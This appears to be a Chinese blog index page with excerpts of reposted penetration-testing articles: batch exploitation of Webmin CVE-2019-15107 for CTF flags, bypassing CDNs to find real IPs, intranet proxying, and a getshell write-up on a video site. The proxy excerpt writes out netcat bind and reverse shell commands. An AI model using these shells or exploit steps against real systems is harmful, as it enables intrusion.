- 博客(6)
- 收藏
- 关注
转载 python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)
webmin漏洞CVE-2019-15107 漏洞原理:使用burpsuit的右键copy as requestsburp0_url = "https://192.168.184.128:10000/password_change.cgi"burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "se...
2019-08-24 20:46:00 1103
转载 绕过cdn查找真实IP
在渗透测试过程中,目标服务器可能只有一个域名。如果目标服务器不存在CDN,可以直接通过www.ip138.com获取目标的一些IP及域名信息。如果存在CDN如何绕过,获取到目标服务器的真实IP?1、目标服务器存在CDN CDN即内容分发网络,主要解决因传输距离和不同运营商节点造成的网络速度性能底下的问题。说的简单点,就是一组在不同运营商之间的对接节点上的高速缓存服务器,吧用...
2019-07-21 20:09:00 415
转载 内网渗透的边界场景分析+内网代理整理
先从nc开始理解正向代理和反向代理:1、正向连接受害者主机执行nc -e -t /bin/bash -lvp 7777攻击者执行nc -t 192.168.16.X 77772、反向连接受害者主机执行nc -t -e cmd.exe 192.168.16.104 7777攻击者主机执行nc -lvp...
2019-03-22 23:19:00 687
转载 内网反向代理的一些整理(深入理解反向代理)
这几天在搞BCTF,是一个简单的内网环境,放到国内,基本小厂的网络拓扑也就这个。环境详情攻击端192.168.16.103外部的防火墙(出口主机)192.168.16.118Web端172.16.10.2 对外映射80端口到192.168.16.118Sever端172.16.10.3内网里面就两台...
2019-03-14 17:56:00 1301
转载 一个付费用户4000+的视频站getshell
只有一个目标域名 domaincom前期信息收集:该站点是一个视频app的推广网站子域名爆破一波:发现一个比较有意思的的视频主站,没有分析app的数据包,但是估计就是调用的这个主站的资源。后台尝试一下:admin直接跳转到了后台,卧槽太顺利了有验证码,瞬间想放弃,师父在旁边说,有验证码就放弃了啊尝试admin:admin登录成功(!!!!!!...
2019-03-08 16:58:00 87
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人